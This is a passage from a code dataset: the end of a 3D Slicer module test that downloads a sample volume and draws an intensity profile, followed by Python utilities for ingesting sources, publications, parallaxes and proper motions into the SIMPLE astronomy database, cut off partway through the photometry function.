def test_LineIntersityProfile1(self):\n \"\"\" Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n #\n # first, get some data\n #\n import urllib\n downloads = (\n ('http://slicer.kitware.com/midas3/download?items=5767',\n 'FA.nrrd', slicer.util.loadVolume),\n )\n\n for url, name, loader in downloads:\n filePath = slicer.app.temporaryPath + '/' + name\n if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:\n logging.info(\n 'Requesting download %s from %s...\\n' % (name, url))\n urllib.urlretrieve(url, filePath)\n if loader:\n logging.info('Loading %s...' 
% (name,))\n loader(filePath)\n self.delayDisplay('Finished with download and loading')\n\n volumeNode = slicer.util.getNode(pattern=\"FA\")\n logic = LineIntersityProfileLogic()\n self.assertTrue(logic.hasImageData(volumeNode))\n # self.delayDisplay('Test passed!')\n\n # Add Test\n # Initialise rule node in a know location\n rulerNode = slicer.vtkMRMLAnnotationRulerNode()\n slicer.mrmlScene.AddNode(rulerNode)\n rulerNode.SetPosition1(-65, 110, 60)\n rulerNode.SetPosition2(-15, 60, 60)\n rulerNode.SetName('Test')\n\n # Initialise input selectors\n moduleWidget = slicer.modules.LineIntersityProfileWidget\n # Note: the end has no \"()\", or a __init__ function required!\n\n moduleWidget.rulerSelector.setCurrentNode(rulerNode)\n moduleWidget.inputSelector1.setCurrentNode(volumeNode)\n moduleWidget.inputSelector2.setCurrentNode(volumeNode)\n\n self.delayDisplay(\"Inputs initialised!\")\n\n # run the logic with the initialised inputs\n moduleWidget.onApplyButton()\n\n self.delayDisplay(\"if you see a ruler and a plot - test passed!\")\n","sub_path":"LineIntersityProfile.py","file_name":"LineIntersityProfile.py","file_ext":"py","file_size_in_byte":16360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"528179730","text":"\"\"\"\nUtils functions for use in ingests\n\"\"\"\nfrom collections import namedtuple\nimport sys\nimport os\nimport re\nimport warnings\n\nfrom pathlib import Path\nfrom astrodbkit2.astrodb import create_database\nfrom astrodbkit2.astrodb import Database\nfrom simple.schema import *\nimport ads\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom astroquery.simbad import Simbad\nfrom astropy.table import Table\n# from contextlib import contextmanager\nfrom sqlalchemy import or_\nfrom sqlalchemy import and_\nimport sqlalchemy.exc\n# import sqlite3\nimport numpy as np\n\n# import astrodbkit2\n\nwarnings.filterwarnings(\"ignore\", module='astroquery.simbad')\n\n\nclass SimpleError(Exception):\n pass\n\n\ndef verboseprint(*args, **kwargs):\n if 'verbose' in kwargs.keys() and kwargs['verbose']:\n del kwargs['verbose']\n return print(*args, **kwargs)\n else:\n return\n\n\n# TODO: commented out as not using with the new custom error\n# @contextmanager\n# def disable_exception_traceback():\n# \"\"\"\n# All traceback information is suppressed and only the exception type and value are printed\n# \"\"\"\n# default_value = getattr(sys, \"tracebacklimit\", 1000) # `1000` is a Python's default value\n# sys.tracebacklimit = 0\n# yield\n# sys.tracebacklimit = default_value # revert changes\n\n\ndef load_simpledb(db_file, RECREATE_DB=True):\n # Utility function to load the database\n\n db_file_path = Path(db_file)\n db_connection_string = 'sqlite:///SIMPLE.db'\n\n if RECREATE_DB and db_file_path.exists():\n os.remove(db_file) # removes the current .db file if one already exists\n\n if not db_file_path.exists():\n create_database(db_connection_string) # creates empty database based on the simple schema\n db = Database(db_connection_string) # connects to the empty database\n db.load_database('data/') # loads the data from the data files into the database\n else:\n db = Database(db_connection_string) # if database already exists, connects to .db file\n\n return db\n\n\ndef sort_sources(db, ingest_names, ingest_ras, ingest_decs, search_radius=60., verbose=False):\n \"\"\"\n Classifying sources to be ingested into the database into three categories:\n 1) in the database with the same name,\n 2) in the database with a 
different name, or\n 3) not in the database and need to be added.\n\n\n Parameters\n ----------\n db\n ingest_names\n Names of sources\n ingest_ras\n Right ascensions of sources. Decimal degrees.\n ingest_decs\n Declinations of sources. Decimal degrees.\n search_radius\n radius in arcseconds to use for source matching\n verbose\n\n Returns\n -------\n missing_sources_index\n Indices of sources which are not in the database\n existing_sources_index\n Indices of sources which are already in the database\n alt_names_table\n List of tuples with Other Names to add to database\n \"\"\"\n\n existing_sources_index = []\n missing_sources_index = []\n Alt_names = namedtuple(\"Alt_names\", \"source other_name\")\n alt_names_table = []\n db_names = []\n\n for i, name in enumerate(ingest_names):\n verboseprint(\"\\n\", i, \": searching:,\", name, verbose=verbose)\n\n namematches = db.search_object(name)\n\n # if no matches, try resolving with Simbad\n if len(namematches) == 0:\n verboseprint(i, \": no name matches, trying simbad search\", verbose=verbose)\n try:\n namematches = db.search_object(name, resolve_simbad=True, verbose=verbose)\n if len(namematches) == 1:\n simbad_match = namematches[0]['source']\n # Populate list with ingest name and database name match\n alt_names_table.append(Alt_names(simbad_match, name))\n except TypeError: # no Simbad match\n namematches = []\n\n # if still no matches, try spatial search using coordinates\n if len(namematches) == 0:\n location = SkyCoord(ingest_ras[i], ingest_decs[i], frame='icrs', unit='deg')\n radius = u.Quantity(search_radius, unit='arcsec')\n verboseprint(i, \": no Simbad match, trying coord search around \", location.ra.hour, location.dec,\n verbose=verbose)\n nearby_matches = db.query_region(location, radius=radius)\n if len(nearby_matches) == 1:\n namematches = nearby_matches\n coord_match = namematches[0]['source']\n # Populate list with ingest name and database name match\n alt_names_table.append(Alt_names(coord_match, name))\n if len(nearby_matches) > 1:\n print(nearby_matches)\n raise RuntimeError(\"too many nearby sources!\")\n\n if len(namematches) == 1:\n existing_sources_index.append(i)\n source_match = namematches[0]['source']\n db_names.append(source_match)\n verboseprint(i, \"match found: \", source_match, verbose=verbose)\n elif len(namematches) > 1:\n raise RuntimeError(i, \"More than one match for \", name, \"/n,\", namematches)\n elif len(namematches) == 0:\n verboseprint(i, \": Not in database\", verbose=verbose)\n missing_sources_index.append(i)\n db_names.append(ingest_names[i])\n else:\n raise RuntimeError(i, \"unexpected condition\")\n\n verboseprint(\"\\n ALL SOURCES SORTED\", verbose=verbose)\n verboseprint(\"\\n Existing Sources:\\n\", ingest_names[existing_sources_index], verbose=verbose)\n verboseprint(\"\\n Missing Sources:\\n\", ingest_names[missing_sources_index], verbose=verbose)\n verboseprint(\"\\n Existing Sources with different name:\\n\", verbose=verbose)\n if verbose:\n # TODO: does pprint_all work here? 
If it's just a list that's undefined\n # alt_names_table.pprint_all()\n pass\n\n n_ingest = len(ingest_names)\n n_existing = len(existing_sources_index)\n n_alt = len(alt_names_table)\n n_missing = len(missing_sources_index)\n\n if n_ingest != n_existing + n_missing:\n raise RuntimeError(\"Unexpected number of sources\")\n\n print(n_existing, \"sources already in database.\")\n print(n_alt, \"sources found with alternate names\")\n print(n_missing, \"sources not found in the database\")\n\n return missing_sources_index, existing_sources_index, alt_names_table\n\n\ndef add_names(db, sources=None, other_names=None, names_table=None, verbose=True):\n \"\"\"\n Add source names to the Names table in the database.\n Provide either two lists of sources and other_names or a 2D names_table.\n\n Parameters\n ----------\n db\n sources\n list of source names which already exist in the database\n other_names\n list of alternate names for sources\n names_table\n table with source and other_names.\n Expecting source name to be first column and other_names in the 2nd.\n verbose\n \"\"\"\n\n if names_table is not None and sources is not None:\n raise RuntimeError(\"Both names table and sources list provided. Provide one or the other\")\n\n names_data = []\n\n\n if sources is not None or other_names is not None:\n # Length of sources and other_names list should be equal\n if len(sources) != len(other_names):\n raise RuntimeError(\"Length of sources and other_names should be equal\")\n\n for source, other_name in zip(sources, other_names):\n names_data.append({'source': source, 'other_name': other_name})\n\n if names_table is not None:\n if len(names_table[0]) != 2:\n raise RuntimeError(\"Each row should have two elements\")\n\n for name_row in names_table:\n names_data.append({'source': name_row[0], 'other_name': name_row[1]})\n\n db.Names.insert().execute(names_data)\n\n n_added = len(names_data)\n\n print(\"Names added to database: \", n_added)\n\n return\n\n\ndef search_publication(db, name: str = None, doi: str = None, bibcode: str = None, verbose: bool = False):\n \"\"\"\n Find publications in the database by matching on the publication name, doi, or bibcode\n\n Parameters\n ----------\n db\n Variable referencing the database to search\n name: str\n Name of publication to search\n doi: str\n DOI of publication to search\n bibcode: str\n ADS Bibcode of publication to search\n verbose : bool\n\n Returns\n -------\n True, 1: if only one match\n False, 0: No matches\n False, N_matches: Mulptiple matches\n\n Examples\n -------\n >>> test = search_publication(db, name='Cruz')\n Found 8 matching publications for Cruz or None or None\n\n >>> test = search_publication(db, name='Kirk19', verbose=True)\n Found 1 matching publications for Kirk19 or None or None\n name bibcode doi\n ------ ------------------- ------------------------\n Kirk19 2019ApJS..240...19K 10.3847/1538-4365/aaf6af\n description\n -----------------------------------------------------------------------------\n Preliminary Trigonometric Parallaxes of 184 Late-T and Y Dwarfs and an\n Analysis of the Field Substellar Mass Function into the Planetary Mass Regime\n\n >>> test = search_publication(db, name='Smith')\n No matching publications for Smith, Trying Smit\n No matching publications for Smit\n Use add_publication() to add it to the database.\n\n See Also\n --------\n add_publication: Function to add publications in the database\n\n \"\"\"\n\n # Make sure a search term is provided\n if name is None and doi is None and bibcode is None:\n 
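# At least one search term is required; the filters built below are case-insensitive ilike matches combined with SQLAlchemy's or_().\n 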
print(\"Name, Bibcode, or DOI must be provided\")\n return False, 0\n\n not_null_pub_filters = []\n if name:\n # fuzzy_query_name = '%' + name + '%'\n not_null_pub_filters.append(db.Publications.c.name.ilike(name))\n if doi:\n not_null_pub_filters.append(db.Publications.c.doi.ilike(doi))\n if bibcode:\n not_null_pub_filters.append(db.Publications.c.bibcode.ilike(bibcode))\n pub_search_table = Table()\n if len(not_null_pub_filters) > 0:\n pub_search_table = db.query(db.Publications).filter(or_(*not_null_pub_filters)).table()\n\n n_pubs_found = len(pub_search_table)\n\n if n_pubs_found == 1:\n verboseprint(f'Found {n_pubs_found} matching publications for {name} or {doi} or {bibcode}', verbose=verbose)\n if verbose:\n pub_search_table.pprint_all()\n return True, 1\n\n if n_pubs_found > 1:\n verboseprint(f'Found {n_pubs_found} matching publications for {name} or {doi} or {bibcode}', verbose=verbose)\n if verbose:\n pub_search_table.pprint_all()\n return False, n_pubs_found\n\n # If no matches found, search using first four characters of input name\n if n_pubs_found == 0 and name:\n shorter_name = name[:4]\n verboseprint(f'No matching publications for {name}, Trying {shorter_name}', verbose=verbose)\n fuzzy_query_shorter_name = '%' + shorter_name + '%'\n pub_search_table = db.query(db.Publications).filter(\n db.Publications.c.name.ilike(fuzzy_query_shorter_name)).table()\n n_pubs_found_short = len(pub_search_table)\n if n_pubs_found_short == 0:\n verboseprint(f'No matching publications for {shorter_name}', verbose=verbose)\n verboseprint('Use add_publication() to add it to the database.', verbose=verbose)\n return False, 0\n\n if n_pubs_found_short > 0:\n print(f'Found {n_pubs_found_short} matching publications for {shorter_name}')\n if verbose:\n pub_search_table.pprint_all()\n return False, n_pubs_found_short\n else:\n return False, n_pubs_found\n\n return\n\n\ndef add_publication(db, doi: str = None, bibcode: str = None, name: str = None, description: str = None,\n ignore_ads: bool = False, save_db=False,\n verbose: bool = True):\n \"\"\"\n Adds publication to the database using DOI or ADS Bibcode, including metadata found with ADS.\n\n In order to auto-populate the fields, An $ADS_TOKEN environment variable must be set.\n See https://ui.adsabs.harvard.edu/user/settings/token\n\n Parameters\n ----------\n db\n Database object\n doi, bibcode: str\n The DOI or ADS Bibcode of the reference. One of these is required input.\n name: str, optional\n The publication shortname, otherwise it will be generated [optional]\n Convention is the first four letters of first authors last name and two digit year (e.g., Smit21)\n For last names which are less than four letters, use '_' or first name initial(s). 
(e.g, Xu__21 or LiYB21)\n description: str, optional\n Description of the paper, typically the title of the papre [optional]\n ignore_ads: bool\n save_db: bool\n verbose: bool\n\n See Also\n --------\n search_publication: Function to find publications in the database\n\n \"\"\"\n\n if not (doi or bibcode):\n print('DOI or Bibcode is required input')\n return\n\n ads.config.token = os.getenv('ADS_TOKEN')\n\n if not ads.config.token and (not name and (not doi or not bibcode)):\n print(\"An ADS_TOKEN environment variable must be set in order to auto-populate the fields.\\n\"\n \"Without an ADS_TOKEN, name and bibcode or DOI must be set explicity.\")\n return\n\n if ads.config.token and not ignore_ads:\n use_ads = True\n else:\n use_ads = False\n\n if bibcode:\n if 'arXiv' in bibcode:\n arxiv_id = bibcode\n bibcode = None\n else:\n arxiv_id = None\n else:\n arxiv_id = None\n\n name_add, bibcode_add, doi_add = '', '', ''\n # Search ADS uing a provided arxiv id\n if arxiv_id and use_ads:\n arxiv_matches = ads.SearchQuery(q=arxiv_id, fl=['id', 'bibcode', 'title', 'first_author', 'year', 'doi'])\n arxiv_matches_list = list(arxiv_matches)\n if len(arxiv_matches_list) != 1:\n print('should only be one matching arxiv id')\n return\n\n if len(arxiv_matches_list) == 1:\n verboseprint(\"Publication found in ADS using arxiv id: \", arxiv_id, verbose=verbose)\n article = arxiv_matches_list[0]\n verboseprint(article.first_author, article.year, article.bibcode, article.title, verbose=verbose)\n if not name: # generate the name if it was not provided\n name_stub = article.first_author.replace(',', '').replace(' ', '')\n name_add = name_stub[0:4] + article.year[-2:]\n else:\n name_add = name\n description = article.title[0]\n bibcode_add = article.bibcode\n doi_add = article.doi[0]\n\n elif arxiv_id:\n name_add = name\n bibcode_add = arxiv_id\n doi_add = doi\n\n # Search ADS using a provided DOI\n if doi and use_ads:\n doi_matches = ads.SearchQuery(doi=doi, fl=['id', 'bibcode', 'title', 'first_author', 'year', 'doi'])\n doi_matches_list = list(doi_matches)\n if len(doi_matches_list) != 1:\n print('should only be one matching DOI')\n return\n\n if len(doi_matches_list) == 1:\n verboseprint(\"Publication found in ADS using DOI: \", doi, verbose=verbose)\n article = doi_matches_list[0]\n verboseprint(article.first_author, article.year, article.bibcode, article.title, verbose=verbose)\n if not name: # generate the name if it was not provided\n name_stub = article.first_author.replace(',', '').replace(' ', '')\n name_add = name_stub[0:4] + article.year[-2:]\n else:\n name_add = name\n description = article.title[0]\n bibcode_add = article.bibcode\n doi_add = article.doi[0]\n elif doi:\n name_add = name\n bibcode_add = bibcode\n doi_add = doi\n\n if bibcode and use_ads:\n bibcode_matches = ads.SearchQuery(bibcode=bibcode, fl=['id', 'bibcode', 'title', 'first_author', 'year', 'doi'])\n bibcode_matches_list = list(bibcode_matches)\n if len(bibcode_matches_list) == 0:\n print('not a valid bibcode:', bibcode)\n print('nothing added')\n raise\n\n elif len(bibcode_matches_list) > 1:\n print('should only be one matching bibcode for:', bibcode)\n print('nothing added')\n raise\n\n elif len(bibcode_matches_list) == 1:\n verboseprint(\"Publication found in ADS using bibcode: \", bibcode, verbose=verbose)\n article = bibcode_matches_list[0]\n verboseprint(article.first_author, article.year, article.bibcode, article.doi, article.title,\n verbose=verbose)\n if not name: # generate the name if it was not provided\n name_stub = 
article.first_author.replace(',', '').replace(' ', '')\n name_add = name_stub[0:4] + article.year[-2:]\n else:\n name_add = name\n description = article.title[0]\n bibcode_add = article.bibcode\n if article.doi is None:\n doi_add = None\n else:\n doi_add = article.doi[0]\n elif bibcode:\n name_add = name\n bibcode_add = bibcode\n doi_add = doi\n\n new_ref = [{'name': name_add, 'bibcode': bibcode_add, 'doi': doi_add, 'description': description}]\n\n try:\n db.Publications.insert().execute(new_ref)\n verboseprint(f'Added {name_add} to Publications table', verbose=verbose)\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"It's possible that a similar publication already exists in database\\n\"\n \"Use search_publication function before adding a new record\")\n\n if save_db:\n db.save_reference_table(table='Publications', directory='data/')\n verboseprint(\"Publication added to database and saved: \", name_add, verbose=verbose)\n else:\n verboseprint(\"Publication added to database: \", name_add, verbose=verbose)\n\n return\n\n# TODO: commented out as not complete\n# def update_publication(db, doi: str = None, bibcode: str = None, name: str = None, description: str = None,\n# save_db: bool = True):\n# \"\"\"\n# Updates publications in the database, including metadata found with ADS.\n#\n# In order to auto-populate the fields, An $ADS_TOKEN environment variable must be set.\n# See https://ui.adsabs.harvard.edu/user/settings/token\n#\n# Parameters\n# ----------\n# db\n# Database object\n# doi, bibcode: str\n# The DOI or ADS Bibcode of the reference.\n# name: str, optional\n# The publication shortname, otherwise it will be generated [optional]\n# description: str, optional\n# Description of the paper, typically the title of the papre [optional]\n# save_db: bool\n#\n# See Also\n# --------\n# search_publication: Function to find publications in the database\n# add_publication: Function to add publications to the database\n#\n# \"\"\"\n#\n# # TODO: provide an option to add missing information\n# # add_doi_bibcode = db.Publications.update().where(db.Publications.c.name == 'Manj19'). \\\n# # values(bibcode='2019AJ....157..101M', doi='10.3847/1538-3881/aaf88f',\n# # description='Cloud Atlas: HST nir spectral library')\n# # db.engine.execute(add_doi_bibcode)\n#\n# # change_name = db.Publications.update().where(db.Publications.c.name == 'Wein12'). 
\\\n# values(name='Wein13')\n# db.engine.execute(change_name)\n#\n# return\n\n\n# Make sure all source names are Simbad resolvable:\ndef check_names_simbad(ingest_names, ingest_ra, ingest_dec, radius='2s', verbose=False):\n resolved_names = []\n n_sources = len(ingest_names)\n n_name_matches = 0\n n_selections = 0\n n_nearby = 0\n n_notfound = 0\n\n for i, ingest_name in enumerate(ingest_names):\n # Query Simbad for identifiers matching the ingest source name\n identifer_result_table = Simbad.query_object(ingest_name, verbose=False)\n\n # Successfully resolved one matching identifier in Simbad\n if identifer_result_table is not None and len(identifer_result_table) == 1:\n # Add the Simbad resolved identifier to the resolved_name list and deal with unicode\n if isinstance(identifer_result_table['MAIN_ID'][0], str):\n resolved_names.append(identifer_result_table['MAIN_ID'][0])\n else:\n resolved_names.append(identifer_result_table['MAIN_ID'][0].decode())\n verboseprint(resolved_names[i], \"Found name match in Simbad\", verbose=verbose)\n n_name_matches = n_name_matches + 1\n\n # If no identifier match found, search within \"radius\" of coords for a Simbad object\n else:\n verboseprint(\"searching around \", ingest_name, verbose=verbose)\n coord_result_table = Simbad.query_region(\n SkyCoord(ingest_ra[i], ingest_dec[i], unit=(u.deg, u.deg), frame='icrs'),\n radius=radius, verbose=verbose)\n\n # If no match is found in Simbad, use the name in the ingest table\n if coord_result_table is None:\n resolved_names.append(ingest_name)\n verboseprint(\"coord search failed\", verbose=verbose)\n n_notfound = n_notfound + 1\n\n # If more than one match found within \"radius\", query user for selection and append to resolved_name\n elif len(coord_result_table) > 1:\n for j, name in enumerate(coord_result_table['MAIN_ID']):\n print(f'{j}: {name}')\n selection = int(input('Choose \\n'))\n if isinstance(coord_result_table['MAIN_ID'][selection], str):\n resolved_names.append(coord_result_table['MAIN_ID'][selection])\n else:\n resolved_names.append(coord_result_table['MAIN_ID'][selection].decode())\n verboseprint(resolved_names[i], \"you selected\", verbose=verbose)\n n_selections = n_selections + 1\n\n # If there is only one match found, accept it and append to the resolved_name list\n elif len(coord_result_table) == 1:\n if isinstance(coord_result_table['MAIN_ID'][0], str):\n resolved_names.append(coord_result_table['MAIN_ID'][0])\n else:\n resolved_names.append(coord_result_table['MAIN_ID'][0].decode())\n verboseprint(resolved_names[i], \"only result nearby in Simbad\", verbose=verbose)\n n_nearby = n_nearby + 1\n\n # Report how many were found via each method\n print(\"Names Found:\", n_name_matches)\n print(\"Names Selected\", n_selections)\n print(\"Names Found Nearby\", n_nearby)\n print(\"Not found\", n_notfound)\n\n n_found = n_notfound + n_name_matches + n_selections + n_nearby\n print('problem' if n_found != n_sources else (n_sources, 'names'))\n\n return resolved_names\n\n\ndef convert_spt_string_to_code(spectral_types, verbose=False):\n \"\"\"\n normal tests: M0, M5.5, L0, L3.5, T0, T3, T4.5, Y0, Y5, Y9.\n weird TESTS: sdM4, ≥Y4, T5pec, L2:, L0blue, Lpec, >L9, >M10, >L, T, Y\n digits are needed in current implementation.\n :param spectral_types:\n :param verbose:\n :return:\n \"\"\"\n\n spectral_type_codes = []\n for spt in spectral_types:\n verboseprint(\"Trying to convert:\", spt, verbose=verbose)\n spt_code = np.nan\n\n if spt == \"\":\n spectral_type_codes.append(spt_code)\n verboseprint(\"Appended 
NAN\", verbose=verbose)\n continue\n\n # identify main spectral class, loop over any prefix text to identify MLTY\n for i, item in enumerate(spt):\n if item == 'M':\n spt_code = 60\n break\n elif item == 'L':\n spt_code = 70\n break\n elif item == 'T':\n spt_code = 80\n break\n elif item == 'Y':\n spt_code = 90\n break\n else: # only trigger if not MLTY\n i = 0\n # find integer or decimal subclass and add to spt_code\n\n spt_code += float(re.findall('\\d*\\.?\\d+', spt[i + 1:])[0])\n spectral_type_codes.append(spt_code)\n verboseprint(spt, spt_code, verbose=verbose)\n return spectral_type_codes\n\n\ndef ingest_sources(db, sources, ras, decs, references, comments=None, epochs=None,\n equinoxes=None, verbose=False, save_db=False):\n \"\"\"\n Script to ingest sources\n\n Parameters\n ----------\n db\n sources\n ras\n decs\n references\n comments\n epochs\n equinoxes\n verbose\n save_db\n\n Returns\n -------\n\n \"\"\"\n\n n_added = 0\n n_sources = len(sources)\n\n if epochs is None:\n epochs = [None] * n_sources\n if equinoxes is None:\n equinoxes = [None] * n_sources\n if comments is None:\n comments = [None] * n_sources\n\n for i, source in enumerate(sources):\n\n # Construct data to be added\n source_data = [{'source': sources[i],\n 'ra': ras[i],\n 'dec': decs[i],\n 'reference': references[i],\n 'epoch': epochs[i],\n 'equinox': equinoxes[i],\n 'comments': comments[i]}]\n verboseprint(source_data, verbose=verbose)\n\n try:\n db.Sources.insert().execute(source_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n # try reference without last letter e.g.Smit04 instead of Smit04a\n if source_data[0]['reference'][-1] in ('a', 'b'):\n source_data[0]['reference'] = references[i][:-1]\n try:\n db.Sources.insert().execute(source_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"Discovery reference may not exist in the Publications table. \"\n \"Add it with add_publication function. \")\n else:\n raise SimpleError(\"Discovery reference may not exist in the Publications table. \"\n \"Add it with add_publication function. 
\")\n\n if save_db:\n db.save_database(directory='data/')\n print(n_added, \"sources added to database and saved\")\n else:\n print(n_added, \"sources added to database\")\n\n return\n\n\ndef ingest_parallaxes(db, sources, plxs, plx_errs, plx_refs, verbose=False):\n \"\"\"\n\n Parameters\n ----------\n db\n Database object\n sources\n list of source names\n plxs\n list of parallaxes corresponding to the sources\n plx_errs\n list of parallaxes uncertainties\n plx_refs\n list of references for the parallax data\n verbose: bool, optional\n If true, outputs information to the screen\n\n Examples\n ----------\n > ingest_parallaxes(db, my_sources, my_plx, my_plx_unc, my_plx_refs, verbose = True)\n\n \"\"\"\n\n n_added = 0\n\n for i, source in enumerate(sources): # loop through sources with parallax data to ingest\n db_name = db.search_object(source, output_table='Sources')[0]['source']\n\n # Search for existing parallax data and determine if this is the best\n # If no previous measurement exists, set the new one to the Adopted measurement\n adopted = None\n duplicate = False\n source_plx_data = db.query(db.Parallaxes).filter(db.Parallaxes.c.source == db_name).table()\n\n if source_plx_data is None or len(source_plx_data) == 0:\n # if there's no other measurements in the database, set new data Adopted = True\n adopted = True\n old_adopted = None\n elif len(source_plx_data) > 0: # Parallax data already exists\n # check for duplicate measurement\n dupe_ind = source_plx_data['reference'] == plx_refs[i]\n if sum(dupe_ind):\n duplicate = True\n verboseprint(\"Duplicate measurement\\n\", source_plx_data[dupe_ind])\n else:\n duplicate = False\n verboseprint(\"!!! Another Proper motion measurement exists,\")\n if verbose:\n source_plx_data.pprint_all()\n\n # check for previous adopted measurement and find new adopted\n adopted_ind = source_plx_data['adopted'] == 1\n if sum(adopted_ind):\n old_adopted = source_plx_data[adopted_ind]\n\n # if errors of new data are less than other measurements, set Adopted = True.\n if plx_errs[i] < min(source_plx_data['parallax_error']):\n adopted = True\n\n # unset old adopted\n if old_adopted:\n db.Parallaxes.update().where(and_(db.Parallaxes.c.source == old_adopted['source'],\n db.Parallaxes.c.reference == old_adopted['reference'])).\\\n values(adopted=False).execute()\n # check that adopted flag is successfully changed\n old_adopted_data = db.query(db.Parallaxes).filter(and_(db.Parallaxes.c.source == old_adopted['source'],\n db.Parallaxes.c.reference == old_adopted['reference'])).table()\n verboseprint(\"Old adopted measurement unset\\n\", old_adopted_data)\n\n verboseprint(\"The new measurement's adopted flag is:\", adopted)\n\n else:\n raise RuntimeError(\"Unexpected state\")\n\n if not duplicate:\n # Construct data to be added\n parallax_data = [{'source': db_name,\n 'parallax': str(plxs[i]),\n 'parallax_error': str(plx_errs[i]),\n 'reference': plx_refs[i],\n 'adopted': adopted}]\n\n verboseprint(parallax_data, verbose=verbose)\n\n try:\n db.Parallaxes.insert().execute(parallax_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"The source may not exist in Sources table.\\n\"\n \"The parallax reference may not exist in Publications table. \"\n \"Add it with add_publication function. 
\\n\"\n \"The parallax measurement may be a duplicate.\")\n\n print(\"Parallaxes added to database: \", n_added)\n\n return\n\n\ndef ingest_proper_motions(db, sources, pm_ras, pm_ra_errs, pm_decs, pm_dec_errs, pm_references, save_db=False,\n verbose=False):\n \"\"\"\n\n Parameters\n ----------\n db\n Database object\n sources\n list of source names\n pm_ras\n list of proper motions in right ascension (RA)\n pm_ra_errs\n list of uncertanties in proper motion RA\n pm_decs\n list of proper motions in declination (dec)\n pm_dec_errs\n list of uncertanties in proper motion dec\n pm_references\n list of references for the proper motion measurements\n save_db: bool, optional\n If set to False (default), will modify the .db file, but not the JSON files\n If set to True, will save the JSON files\n verbose: bool, optional\n If true, outputs information to the screen\n\n Examples\n ----------\n > ingest_proper_motions(db, my_sources, my_pm_ra, my_pm_ra_unc, my_pm_dec, my_pm_dec_unc, my_pm_refs,\n verbose = True)\n\n \"\"\"\n\n n_added = 0\n\n for i, source in enumerate(sources):\n db_name_match = db.search_object(source, output_table='Sources', fuzzy_search=False)\n\n # If no matches, try fuzzy search\n if len(db_name_match) == 0:\n db_name_match = db.search_object(source, output_table='Sources', fuzzy_search=True)\n\n # If still no matches, try to resolve the name with Simbad\n if len(db_name_match) == 0:\n db_name_match = db.search_object(source, output_table='Sources', resolve_simbad=True)\n\n if len(db_name_match) == 1:\n db_name = db_name_match['source'][0]\n verboseprint(\"\\n\", db_name, \"One source match found\", verbose=verbose)\n elif len(db_name_match) > 1:\n print(\"\\n\", source)\n print(db_name_match)\n raise RuntimeError(source, \"More than one match source found in the database\")\n elif len(db_name_match) == 0:\n print(\"\\n\", source)\n raise RuntimeError(source, \"No source found in the database\")\n else:\n print(\"\\n\", source)\n print(db_name_match)\n raise RuntimeError(source, \"unexpected condition\")\n\n # Search for existing proper motion data and determine if this is the best\n # If no previous measurement exists, set the new one to the Adopted measurement\n adopted = None\n duplicate = False\n source_pm_data = db.query(db.ProperMotions).filter(db.ProperMotions.c.source == db_name).table()\n if source_pm_data is None or len(source_pm_data) == 0:\n # if there's no other measurements in the database, set new data Adopted = True\n adopted = True\n duplicate = False\n elif len(source_pm_data) > 0:\n # check to see if other measurement is a duplicate of the new data\n for pm_data in source_pm_data:\n if pm_data['reference'] == pm_references[i]:\n duplicate = True\n verboseprint(\"Duplicate measurement\\n\", pm_data, verbose=verbose)\n if not duplicate:\n # if errors of new data are less than other measurements, set Adopted = True.\n if pm_ra_errs[i] < min(source_pm_data['mu_ra_error']) and pm_dec_errs[i] < min(\n source_pm_data['mu_dec_error']):\n adopted = True\n elif min(source_pm_data['mu_ra_error']) < pm_ra_errs[i] and min(source_pm_data['mu_dec_error']) < \\\n pm_dec_errs[i]:\n # TODO: implement approach from ingest_parallaxes to set/unset adopted flag\n adopted_pm = db.ProperMotions.update().where(and_(db.ProperMotions.c.source == db_name,\n db.ProperMotions.c.mu_ra_error == min(\n source_pm_data['mu_ra_error']),\n db.ProperMotions.c.mu_dec_error == min(\n source_pm_data['mu_dec_error']))). 
\\\n values(adopted=True)\n db.engine.execute(adopted_pm)\n verboseprint(\"Will eventually make measurement with min ra and dec errors Adopted.\",\n verbose=verbose)\n\n verboseprint(\"!!! Another Proper motion exists, Adopted:\", adopted, verbose=verbose)\n if verbose:\n source_pm_data.pprint_all()\n\n else:\n raise RuntimeError(\"Unexpected state\")\n\n # Construct data to be added\n if not duplicate:\n pm_data = [{'source': db_name,\n 'mu_ra': pm_ras[i],\n 'mu_ra_error': pm_ra_errs[i],\n 'mu_dec': pm_decs[i],\n 'mu_dec_error': pm_dec_errs[i],\n 'adopted': adopted,\n 'reference': pm_references[i]}]\n verboseprint('Proper motion data to add: ', pm_data, verbose=verbose)\n\n try:\n db.ProperMotions.insert().execute(pm_data)\n n_added += 1\n except sqlalchemy.exc.IntegrityError:\n raise SimpleError(\"The source may not exist in Sources table.\\n\"\n \"The proper motion reference may not exist in Publications table. \"\n \"Add it with add_publication function. \\n\"\n \"The proper motion measurement may be a duplicate.\")\n\n if save_db:\n db.save_database(directory='data/')\n print(\"Proper motions added to database and saved: \", n_added)\n else:\n print(\"Proper motions added to database: \", n_added)\n\n return\n\n\ndef ingest_photometry(db, sources, bands, magnitudes, magnitude_errors, reference, ucds=None,\n telescope=None, instrument=None, epoch=None, comments=None, verbose=False):\n\n n_added = 0\n\n n_sources = len(sources)\n\n if n_sources != len(magnitudes) or n_sources != len(magnitude_errors):\n raise RuntimeError(\"N Sources:\",len(sources), \" N Magnitudes\", len(magnitudes), \" N Mag errors:\",\n len(magnitude_errors),\n \"\\nSources, magnitudes, and magnitude error lists should all be same length\")\n\n if isinstance(bands, str):\n bands = [bands] * len(sources)\n\n if isinstance(reference, str):\n reference = [reference] * len(sources)\n\n if isinstance(telescope, str):\n telescope = [telescope] * len(sources)\n\n if isinstance(instrument, str):\n instrument = [instrument] * len(sources)\n\n if isinstance(ucds, str):\n ucds = [ucds] * len(sources)\n\n if n_sources != len(reference) or 